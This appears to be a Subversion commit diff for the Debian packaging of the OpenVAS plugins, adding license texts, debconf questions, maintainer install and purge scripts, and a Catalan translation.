version. +These scripts are free software; you can redistribute it and/or modify it +under the same terms as Perl itself. - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. 
+-------------------------------------------------------------------------- + Plugins +-------------------------------------------------------------------------- - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA +All of the C and NASL scripts included in this release (unless noted +otherwise in the plugin itself, see below) are distributed +under the "Nessus Script License" which is equivalent to the +GNU General Public License version 2: -On Debian systems, the complete text of the GNU General Public License -can be found in /usr/share/common-licenses/GPL-2 file. + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. -other Licenses: - Files: config.* - Copyright (C) 1992-2006 Free Software Foundation, Inc - License: GPL-2+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA + +On Debian systems, full text of the GNU GPL can always be +found in the /usr/share/common-licenses/GPL file. - File: configure - Copyright (C) 1992-2006 Free Software Foundation, Inc - License: - This configure script is free software; the Free Software Foundation - gives unlimited permission to copy, distribute and modify it. +The NASL plugins might include text provided from vendor advisories +that are distributed under different license contents. 
Most notably: - File: configure.in - Copyright (C) 1998 - 2006 Tenable Network Security, Inc. - License: GPL-2 - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License version 2, - as published by the Free Software Foundation +Debian advisories +----------------- - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. +Debian advisories are (c) 1997-2005 Software in the Public Interest, Inc. +for more information see http://www.debian.org/licens - File: ltmain.sh - Copyright (C) 1996-2005 Free Software Foundation, Inc. - License: GPL-2+ +This material may be distributed only subject to the terms and conditions +set forth in the Open Publication License, Draft v1.0 or later +(the latest version is presently available at +http://www.opencontent.org/openpub/) - File: openvas-nvt-sync.in - Copyright DN-Systems Enterprise Internet Solutions GmbH 2007 - License: GPL-2 +Full license: - File: plugins/3com_hub/3com_hub.c - Copyright (C) Renaud Deraison - License: GPL-2 + Open Publication License - File: plugins/find_service/find_service.c - License: GPL + v1.0, 8 June 1999 - File: plugins/openvas_tcp_scanner/openvas_tcp_scanner.c - Copyright (C) 2004 Michel Arboi - License: GPL-2 +I. REQUIREMENTS ON BOTH UNMODIFIED AND MODIFIED VERSIONS -The Debian packaging is licensed under the GPL-3, and - (c) 2009 Jan Wagner + The Open Publication works may be reproduced and distributed in whole + or in part, in any medium physical or electronic, provided that the + terms of this license are adhered to, and that this license or an + incorporation of it by reference (with any options elected by the + author(s) and/or publisher) is displayed in the reproduction. 
-On Debian systems, the complete text of the GNU General -Public License version 3 can be found in `/usr/share/common-licenses/GPL-3'. + Proper form for an incorporation by reference is as follows: Copyright + (c) by . This material may be + distributed only subject to the terms and conditions set forth in the + Open Publication License, vX.Y or later (the latest version is + presently available at http://www.opencontent.org/openpub/). The + reference must be immediately followed with any options elected by the + author(s) and/or publisher of the document (see section VI). + + Commercial redistribution of Open Publication-licensed material is + permitted. + + Any publication in standard (paper) book form shall require the + citation of the original publisher and author. The publisher and + author's names shall appear on all outer surfaces of the book. On all + outer surfaces of the book the original publisher's name shall be as + large as the title of the work and cited as possessive with respect to + the title. + +II. COPYRIGHT + + The copyright to each Open Publication is owned by its author(s) or + designee. + +III. SCOPE OF LICENSE + + The following license terms apply to all Open Publication works, + unless otherwise explicitly stated in the document. + + Mere aggregation of Open Publication works or a portion of an Open + Publication work with other works or programs on the same media shall + not cause this license to apply to those other works. The aggregate + work shall contain a notice specifying the inclusion of the Open + Publication material and appropriate copyright notice. + + SEVERABILITY. If any part of this license is found to be unenforceable + in any jurisdiction, the remaining portions of the license remain in + force. + + NO WARRANTY. 
Open Publication works are licensed and provided "as is" + without warranty of any kind, express or implied, including, but not + limited to, the implied warranties of merchantability and fitness for + a particular purpose or a warranty of non-infringement. + +IV. REQUIREMENTS ON MODIFIED WORKS + + All modified versions of documents covered by this license, including + translations, anthologies, compilations and partial documents, must + meet the following requirements: + * The modified version must be labeled as such. + * The person making the modifications must be identified and the + modifications dated. + * Acknowledgement of the original author and publisher if applicable + must be retained according to normal academic citation practices. + * The location of the original unmodified document must be + identified. + * The original author's (or authors') name(s) may not be used to + assert or imply endorsement of the resulting document without the + original author's (or authors') permission. + +V. GOOD-PRACTICE RECOMMENDATIONS + + In addition to the requirements of this license, it is requested from + and strongly recommended of redistributors that: + * If you are distributing Open Publication works on hardcopy or + CD-ROM, you provide email notification to the authors of your + intent to redistribute at least thirty days before your manuscript + or media freeze, to give the authors time to provide updated + documents. This notification should describe modifications, if + any, made to the document. + * All substantive modifications (including deletions) be either + clearly marked up in the document or else described in an + attachment to the document. + * Finally, while it is not mandatory under this license, it is + considered good form to offer a free copy of any hardcopy and + CD-ROM expression of an Open Publication-licensed work to its + author(s). + +VI. 
LICENSE OPTIONS + + The author(s) and/or publisher of an Open Publication-licensed + document may elect certain options by appending language to the + reference to or copy of the license. These options are considered part + of the license instance and must be included with the license (or its + incorporation by reference) in derived works. + + A. To prohibit distribution of substantively modified versions without + the explicit permission of the author(s). "Substantive modification" + is defined as a change to the semantic content of the document, and + excludes mere changes in format or typographical corrections. + + To accomplish this, add the phrase `Distribution of substantively + modified versions of this document is prohibited without the explicit + permission of the copyright holder.' to the license reference or copy. + + B. To prohibit any publication of this work or derivative works in + whole or in part in standard (paper) book form for commercial purposes + is prohibited unless prior permission is obtained from the copyright + holder. + + To accomplish this, add the phrase 'Distribution of the work or + derivative of the work in any standard (paper) book form is prohibited + unless prior permission is obtained from the copyright holder.' to the + license reference or copy. + +Gentoo advisories +----------------- + +Gentoo Advisories are (c) 2001-2005 Gentoo Foundation, Inc. + +The messages of Gentoo advisories are release under the +Creative Commons - Attribution / Share Alike license. + + You are free: + * to copy, distribute, display, and perform the work + * to make derivative works + * to make commercial use of the work + + Under the following conditions: + + by + Attribution. You must give the original author credit. + Share Alike. If you alter, transform, or build upon this work, you may + distribute the resulting work only under a license identical to this + one. 
+ * For any reuse or distribution, you must make clear to others the + license terms of this work. + * Any of these conditions can be waived if you get permission from + the copyright holder. + Your fair use and other rights are in no way affected by the above. + +For more information see http://creativecommons.org/licenses/by-sa/2.0/ + +Full license: + + Creative Commons + + Creative Commons Legal Code + + Attribution-ShareAlike 2.0 + CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE + LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE DOES NOT CREATE AN + ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS + INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES + REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR + DAMAGES RESULTING FROM ITS USE. + + License + + THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS + CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS + PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE + WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS + PROHIBITED. + + BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND + AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS + YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF + SUCH TERMS AND CONDITIONS. + + 1. Definitions + a. "Collective Work" means a work, such as a periodical issue, + anthology or encyclopedia, in which the Work in its entirety in + unmodified form, along with a number of other contributions, + constituting separate and independent works in themselves, are + assembled into a collective whole. A work that constitutes a + Collective Work will not be considered a Derivative Work (as + defined below) for the purposes of this License. + b. 
"Derivative Work" means a work based upon the Work or upon the + Work and other pre-existing works, such as a translation, musical + arrangement, dramatization, fictionalization, motion picture + version, sound recording, art reproduction, abridgment, + condensation, or any other form in which the Work may be recast, + transformed, or adapted, except that a work that constitutes a + Collective Work will not be considered a Derivative Work for the + purpose of this License. For the avoidance of doubt, where the + Work is a musical composition or sound recording, the + synchronization of the Work in timed-relation with a moving image + ("synching") will be considered a Derivative Work for the purpose + of this License. + c. "Licensor" means the individual or entity that offers the Work + under the terms of this License. + d. "Original Author" means the individual or entity who created the + Work. + e. "Work" means the copyrightable work of authorship offered under + the terms of this License. + f. "You" means an individual or entity exercising rights under this + License who has not previously violated the terms of this License + with respect to the Work, or who has received express permission + from the Licensor to exercise rights under this License despite a + previous violation. + g. "License Elements" means the following high-level license + attributes as selected by Licensor and indicated in the title of + this License: Attribution, ShareAlike. + + 2. Fair Use Rights. Nothing in this license is intended to reduce, + limit, or restrict any rights arising from fair use, first sale or + other limitations on the exclusive rights of the copyright owner under + copyright law or other applicable laws. + + 3. License Grant. Subject to the terms and conditions of this License, + Licensor hereby grants You a worldwide, royalty-free, non-exclusive, + perpetual (for the duration of the applicable copyright) license to + exercise the rights in the Work as stated below: + a. 
to reproduce the Work, to incorporate the Work into one or more + Collective Works, and to reproduce the Work as incorporated in the + Collective Works; + b. to create and reproduce Derivative Works; + c. to distribute copies or phonorecords of, display publicly, perform + publicly, and perform publicly by means of a digital audio + transmission the Work including as incorporated in Collective + Works; + d. to distribute copies or phonorecords of, display publicly, perform + publicly, and perform publicly by means of a digital audio + transmission Derivative Works. + e. For the avoidance of doubt, where the work is a musical + composition: + i. Performance Royalties Under Blanket Licenses. Licensor waives + the exclusive right to collect, whether individually or via a + performance rights society (e.g. ASCAP, BMI, SESAC), + royalties for the public performance or public digital + performance (e.g. webcast) of the Work. + ii. Mechanical Rights and Statutory Royalties. Licensor waives + the exclusive right to collect, whether individually or via a + music rights society or designated agent (e.g. Harry Fox + Agency), royalties for any phonorecord You create from the + Work ("cover version") and distribute, subject to the + compulsory license created by 17 USC Section 115 of the US + Copyright Act (or the equivalent in other jurisdictions). + f. Webcasting Rights and Statutory Royalties. For the avoidance of + doubt, where the Work is a sound recording, Licensor waives the + exclusive right to collect, whether individually or via a + performance-rights society (e.g. SoundExchange), royalties for the + public digital performance (e.g. webcast) of the Work, subject to + the compulsory license created by 17 USC Section 114 of the US + Copyright Act (or the equivalent in other jurisdictions). + + The above rights may be exercised in all media and formats whether now + known or hereafter devised. 
The above rights include the right to make + such modifications as are technically necessary to exercise the rights + in other media and formats. All rights not expressly granted by + Licensor are hereby reserved. + + 4. Restrictions.The license granted in Section 3 above is expressly + made subject to and limited by the following restrictions: + a. You may distribute, publicly display, publicly perform, or + publicly digitally perform the Work only under the terms of this + License, and You must include a copy of, or the Uniform Resource + Identifier for, this License with every copy or phonorecord of the + Work You distribute, publicly display, publicly perform, or + publicly digitally perform. You may not offer or impose any terms + on the Work that alter or restrict the terms of this License or + the recipients' exercise of the rights granted hereunder. You may + not sublicense the Work. You must keep intact all notices that + refer to this License and to the disclaimer of warranties. You may + not distribute, publicly display, publicly perform, or publicly + digitally perform the Work with any technological measures that + control access or use of the Work in a manner inconsistent with + the terms of this License Agreement. The above applies to the Work + as incorporated in a Collective Work, but this does not require + the Collective Work apart from the Work itself to be made subject + to the terms of this License. If You create a Collective Work, + upon notice from any Licensor You must, to the extent practicable, + remove from the Collective Work any reference to such Licensor or + the Original Author, as requested. If You create a Derivative + Work, upon notice from any Licensor You must, to the extent + practicable, remove from the Derivative Work any reference to such + Licensor or the Original Author, as requested. + b. 
You may distribute, publicly display, publicly perform, or + publicly digitally perform a Derivative Work only under the terms + of this License, a later version of this License with the same + License Elements as this License, or a Creative Commons iCommons + license that contains the same License Elements as this License + (e.g. Attribution-ShareAlike 2.0 Japan). You must include a copy + of, or the Uniform Resource Identifier for, this License or other + license specified in the previous sentence with every copy or + phonorecord of each Derivative Work You distribute, publicly + display, publicly perform, or publicly digitally perform. You may + not offer or impose any terms on the Derivative Works that alter + or restrict the terms of this License or the recipients' exercise + of the rights granted hereunder, and You must keep intact all + notices that refer to this License and to the disclaimer of + warranties. You may not distribute, publicly display, publicly + perform, or publicly digitally perform the Derivative Work with + any technological measures that control access or use of the Work + in a manner inconsistent with the terms of this License Agreement. + The above applies to the Derivative Work as incorporated in a + Collective Work, but this does not require the Collective Work + apart from the Derivative Work itself to be made subject to the + terms of this License. + c. 
If you distribute, publicly display, publicly perform, or publicly + digitally perform the Work or any Derivative Works or Collective + Works, You must keep intact all copyright notices for the Work and + give the Original Author credit reasonable to the medium or means + You are utilizing by conveying the name (or pseudonym if + applicable) of the Original Author if supplied; the title of the + Work if supplied; to the extent reasonably practicable, the + Uniform Resource Identifier, if any, that Licensor specifies to be + associated with the Work, unless such URI does not refer to the + copyright notice or licensing information for the Work; and in the + case of a Derivative Work, a credit identifying the use of the + Work in the Derivative Work (e.g., "French translation of the Work + by Original Author," or "Screenplay based on original Work by + Original Author"). Such credit may be implemented in any + reasonable manner; provided, however, that in the case of a + Derivative Work or Collective Work, at a minimum such credit will + appear where any other comparable authorship credit appears and in + a manner at least as prominent as such other comparable authorship + credit. + + 5. Representations, Warranties and Disclaimer + + UNLESS OTHERWISE AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS + THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND + CONCERNING THE MATERIALS, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, + INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, + FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF + LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF + ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW + THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY + TO YOU. + + 6. Limitation on Liability. 
EXCEPT TO THE EXTENT REQUIRED BY + APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY + LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR + EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, + EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. + + 7. Termination + a. This License and the rights granted hereunder will terminate + automatically upon any breach by You of the terms of this License. + Individuals or entities who have received Derivative Works or + Collective Works from You under this License, however, will not + have their licenses terminated provided such individuals or + entities remain in full compliance with those licenses. Sections + 1, 2, 5, 6, 7, and 8 will survive any termination of this License. + b. Subject to the above terms and conditions, the license granted + here is perpetual (for the duration of the applicable copyright in + the Work). Notwithstanding the above, Licensor reserves the right + to release the Work under different license terms or to stop + distributing the Work at any time; provided, however that any such + election will not serve to withdraw this License (or any other + license that has been, or is required to be, granted under the + terms of this License), and this License will continue in full + force and effect unless terminated as stated above. + + 8. Miscellaneous + a. Each time You distribute or publicly digitally perform the Work or + a Collective Work, the Licensor offers to the recipient a license + to the Work on the same terms and conditions as the license + granted to You under this License. + b. Each time You distribute or publicly digitally perform a + Derivative Work, Licensor offers to the recipient a license to the + original Work on the same terms and conditions as the license + granted to You under this License. + c. 
If any provision of this License is invalid or unenforceable under + applicable law, it shall not affect the validity or enforceability + of the remainder of the terms of this License, and without further + action by the parties to this agreement, such provision shall be + reformed to the minimum extent necessary to make such provision + valid and enforceable. + d. No term or provision of this License shall be deemed waived and no + breach consented to unless such waiver or consent shall be in + writing and signed by the party to be charged with such waiver or + consent. + e. This License constitutes the entire agreement between the parties + with respect to the Work licensed here. There are no + understandings, agreements or representations with respect to the + Work not specified here. Licensor shall not be bound by any + additional provisions that may appear in any communication from + You. This License may not be modified without the mutual written + agreement of the Licensor and You. + + Creative Commons is not a party to this License, and makes no warranty + whatsoever in connection with the Work. Creative Commons will not be + liable to You or any party on any legal theory for any damages + whatsoever, including without limitation any general, special, + incidental or consequential damages arising in connection to this + license. Notwithstanding the foregoing two (2) sentences, if Creative + Commons has expressly identified itself as the Licensor hereunder, it + shall have all rights and obligations of Licensor. + + Except for the limited purpose of indicating to the public that the + Work is licensed under the CCPL, neither party will use the trademark + "Creative Commons" or any related trademark or logo of Creative + Commons without the prior written consent of Creative Commons. 
Any + permitted use will be in compliance with Creative Commons' + then-current trademark usage guidelines, as may be published on its + website or otherwise made available upon request from time to time. + + Creative Commons may be contacted at http://creativecommons.org/. + +Other plugins +------------ + +The following plugins do not hold a GPL license: + +netware_post_perl.nasl is (c) 2002 visigoth + + This script is distributed under a BSD style license + allowing free use and continued development provided + the above Copyright message remains. + Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,60 @@ +#!/bin/sh -e +# Config script for openvas-plugins +# (c) 2003-2007 Javier Fernández-Sanguino +# Some ideas stolen from the geneweb package (and contributed by +# Christian Perrier) + +. /usr/share/debconf/confmodule +db_version 2.0 || [ $? -lt 30 ] +db_title "OpenVAS plugins" + + +find_updated_plugs () { + DIST_PLIST=`mktemp` + ORIG_PLIST=`mktemp` + cat $OPENVASPLIST | sort > $DIST_PLIST + find $PLUGINDIR -maxdepth 1 -type f | sort > $ORIG_PLIST + comm -13 $DIST_PLIST $ORIG_PLIST + rm -f $ORIG_PLIST $DIST_PLIST + return 0 +} + +PLUGINDIR=/var/lib/openvas/plugins/ +OPENVASPLIST=/var/lib/dpkg/info/openvas-plugins.list +MAX_ENTRIES=5 +[ -d $PLUGINDIR ] && ( [ "$1" = "configure" ] || [ "$1" = "reconfigure" ] ) && { +# We need to remove _all_ the plugins in the previous installation +# otherwise there might be stuff which we do not want + + newplugs="`find_updated_plugs`" + if [ -n "$newplugs" ] ; then + countnewplugs="`echo $newplugs |wc -l`" + else + countnewplugs=0 + fi + if [ -n "$newplugs" ] || [ "$1" = "reconfigure" ] ; then + +# I'm not convinced that there is any need to list all the plugins +# which are new here. This question could even be asked regardless +# of wether there are new plugins or not... 
(jfs) +# if [ $countnewplugs -gt $MAX_ENTRIES ] ; then + # List should be limited to, say, 5 entries at most to avoid + # filling up the screen +# newplugs="`echo $newplugs |head -$MAX_ENTRIES`" +# newplugs="$newplugs (...)" +# fi +# newplugs=`echo $newplugs | perl -pe 's/\n/, /g'` +# db_subst openvas-plugins/remove_unknown newplugs "$newplugs" || true + +# This will give an indication of the stuff that will be removed + db_subst openvas-plugins/remove_unknown countnewplugs "$countnewplugs" || true +# Ask the question + db_input medium openvas-plugins/remove_unknown || true + fi +} + +#DEBHELPER# + +db_go + +exit 0 Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 22:38:55 UTC (rev 5408) @@ -1,2 +1,3 @@ -usr/lib/openvas/plugins +var/lib/openvas/.desc-plugins var/lib/openvas/plugins +var/lib/openvas/plugins-factory Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,48 @@ +#!/bin/sh -e +# Postinst script for openvas-plugins +# (c) 2003-2007 Javier Fernández-Sanguino + +. /usr/share/debconf/confmodule +db_version 2.0 +test $DEBIAN_SCRIPT_DEBUG && set -v -x + + +# Note, This is far from optimal and might take some time to run. +# (and we have to do it again since we cannot preserve it through +# configure/postinst calls) +find_updated_plugs () { + DIST_PLIST=`mktemp` + ORIG_PLIST=`mktemp` + cat $OPENVASPLIST | sort > $DIST_PLIST + find $PLUGINDIR -maxdepth 1 -type f | sort > $ORIG_PLIST + comm -13 $DIST_PLIST $ORIG_PLIST + rm -f $ORIG_PLIST $DIST_PLIST + return 0 +} + +PLUGINDIR=/var/lib/openvas/plugins/ +OPENVASPLIST=/var/lib/dpkg/info/openvas-plugins.list +if [ "$1" = "configure" ] && [ -d $PLUGINDIR ]; then + db_get openvas-plugins/remove_unknown || true + REMOVE="$RET" + if [ "$REMOVE" = "true" ] ; then + newplugs="`find_updated_plugs`" + if [ -n "$newplugs" ] ; then + echo $newplugs | xargs -r rm -f + fi + fi +fi + +# Revert the change introduced in 2.0.10a-4, since +# now all plugins are in /var/ +if [ -d /var/lib/openvas/.desc-plugins ] && \ + [ -d /var/lib/openvas/plugins ] ; then + [ -L /var/lib/openvas/plugins/.desc ] && rm -f /var/lib/openvas/plugins/.desc + if [ ! -e /var/lib/openvas/plugins/.desc ]; then + mv /var/lib/openvas/.desc-plugins /var/lib/openvas/plugins/.desc + fi +fi + +#DEBHELPER# + +exit 0 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,32 @@ +#!/bin/sh -e + +if [ "$1" = "purge" ] && [ -d /usr/lib/openvas/plugins ]; then + echo "" + echo "The /usr/lib/openvas/plugins directory still exists." + echo "This might be because you downloaded additional plugins into it" + echo "when using a previous Nessus version." + echo -n "Do you want to remove the full directory now? " + read ANSWER + case $ANSWER in + [yY]*) rm -rf /usr/lib/openvas/plugins ;; + esac +fi + +if [ "$1" = "purge" ] && [ -d /var/lib/openvas/plugins ]; then + echo "" + echo "The /var/lib/openvas/plugins directory still exists." + echo "This might be because you downloaded additional plugins into it." + if [ -d /var/lib/openvas/plugins/.desc ]; then + echo "Or because the openvasd package was not fully purged." + fi + echo "" + echo -n "Do you want to remove the full directory now? " + read ANSWER + case $ANSWER in + [yY]*) rm -rf /var/lib/openvas/plugins ;; + esac +fi + +#DEBHELPER# + +exit 0 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,39 @@ +#!/bin/sh -e +# Preinst script for openvas-plugins +# (c) 2004-2007 Javier Fernández-Sanguino + +PLUGINDIR=/var/lib/openvas/ +OPLUGINDIR=/usr/lib/openvas/ + +# Basicly, check if there is anything + +[ ! -d $OPLUGINDIR ] && exit 0 + +echo -n "Moving plugins from $OPLUGINDIR to $PLUGINDIR..." +if [ ! -d $PLUGINDIR ] ; then + mkdir -p $PLUGINDIR + chown root:root $PLUGINDIR + chmod 0766 $PLUGINDIR +fi + +# Now, we don't care about descriptions, they will be regenerated +[ -d "$OPLUGINDIR/.desc" ] && rm -rf $OPLUGINDIR/.desc +[ ! -d "$PLUGINDIR/.desc" ] && mkdir $PLUGINDIR/.desc + +find $OPLUGINDIR -maxdepth 1 -mindepth 1 | +while read content; do + base=`basename $content` + if [ -e "$PLUGINDIR/$base" ]; then + cp -a "$OPLUGINDIR/$base" $PLUGINDIR + rm -rf "$OPLUGINDIR/$base" + else + mv "$OPLUGINDIR/$base" $PLUGINDIR + fi +done + + +echo ".done" + +#DEBHELPER# + +exit 0 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,12 @@ +Template: openvas-plugins/remove_unknown +Type: boolean +Default: false +_Description: Remove unknown OpenVAS plugins? + The /var/lib/openvas/plugins directory includes some unknown plugins. This + is probably because you downloaded additional plugins into it (e.g. by + running openvas-update-plugins). You currently have ${countnewplugs} + plugin(s) which are not provided by this package. + . + Note: This will apply to all your new installations/upgrades of this package + until you reconfigure it. You should say 'No' if you plan to + use openvas-update-plugins in the future. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:38:55 UTC (rev 5408) @@ -1 +1,3 @@ -10_fix_install_permissions.dpatch +01_makefile_fix_distclean.dpatch +02_adjust_examples.dpatch +03_makefile_clean_space.dpatch Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -1,18 +0,0 @@ -#! /bin/sh /usr/share/dpatch/dpatch-run -## 10_fix_install_permissions.dpatch by Jan Wagner -## -## DP: fix permissions for shared libraries - - at DPATCH@ -diff -urNad openvas-plugins-1.0.7~/Makefile openvas-plugins-1.0.7/Makefile ---- openvas-plugins-1.0.7~/Makefile 2009-04-17 11:56:08.000000000 +0200 -+++ openvas-plugins-1.0.7/Makefile 2009-09-18 12:41:31.000000000 +0200 -@@ -33,7 +33,7 @@ - - install-nes: install-dirs - for plugins in bin/*.nes; do \ -- $(INSTALL) -m 555 $$plugins \ -+ $(INSTALL) -m 444 $$plugins \ - $(DESTDIR)${libdir}/openvas/plugins; \ - done - Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/POTFILES.in =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/POTFILES.in 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/POTFILES.in 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1 @@ +[type: gettext/rfc822deb] openvas-plugins.templates Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ca.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ca.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ca.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,70 @@ +# nessus-plugins (debconf) translation to Catalan. +# Copyright (C) 2004 Free Software Foundation, Inc. +# Aleix Badia i Bosch , 2004 +# Matt Boner , 2004 +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.0.10a-2_templates\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-03-12 19:46GMT\n" +"Last-Translator: Aleix Badia i Bosch \n" +"Language-Team: Catalan \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Voleu suprimir els connectors desconeguts del Nessus?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"En el directori /var/lib/nessus/plugins hi ha diversos connectors " +"desconeguts. Probablement es degui a que hi heu baixat connectors " +"addicionals (ex. executant el programa nessus-update-plugins). Actualment " +"teniu ${countnewplugs} connectors que no els proporciona el paquet." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. 
